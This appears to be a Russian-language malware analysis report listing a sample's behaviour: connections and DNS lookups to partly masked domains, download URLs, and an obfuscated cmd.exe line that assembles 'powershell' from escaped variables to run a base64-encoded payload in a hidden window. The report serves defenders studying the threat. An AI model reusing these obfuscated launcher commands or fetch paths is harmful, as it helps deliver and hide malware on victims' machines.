Техническая информация
- '<SYSTEM32>\cmd.exe' /v /c "set %MTXMsoNEc%=hNsMAdPSD&&set %nPWlrffCd%=p^o^w^e^r^s&&set %TlPFjRDuI%=QuDQzmMSw&&set %RbUWJWiSn%=he^l^l&&set %QXDkovoXM%=iZskIFAFl&&!%nPWlrffCd%!!%RbUWJWiSn%! ^-^e IAAmACgA...
- 'br###-musik.de':80
- 'ma######stestingequip.com':80
- 'lc##.org':80
- 'lc##.org':443
- 'ta###rs.com.au':80
- 'pr####ksfarm.com':80
- http://br###-musik.de/mkPVA/
- http://ma######stestingequip.com/o/
- http://lc##.org/NGLCWStUc/
- http://www.lc##.org/NGLCWStUc/
- http://ta###rs.com.au/BQSV/
- http://pr####ksfarm.com/ZGOxsJmnx/
- 'lc##.org':443
- DNS ASK br###-musik.de
- DNS ASK ma######stestingequip.com
- DNS ASK lc##.org
- DNS ASK ta###rs.com.au
- DNS ASK pr####ksfarm.com
- '<SYSTEM32>\cmd.exe' /v /c "set %MTXMsoNEc%=hNsMAdPSD&&set %nPWlrffCd%=p^o^w^e^r^s&&set %TlPFjRDuI%=QuDQzmMSw&&set %RbUWJWiSn%=he^l^l&&set %QXDkovoXM%=iZskIFAFl&&!%nPWlrffCd%!!%RbUWJWiSn%! ^-^e IAAmACgA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAFAAUwBoAE8AbQBlAFsAMgAxAF0AKwAkAFAAUwBIAE8ATQBlAFsAMwA0AF0AKwAnAHgAJwApACAAKAAgAC0ASgBPAEkATgAoACcAMwA2AHYAMQAxADkAUwAxADEANQBoADkAOQA6ADEAMQA0AHgAMQAwADUAUwAxADEAMgA6ADEAMQA2AF...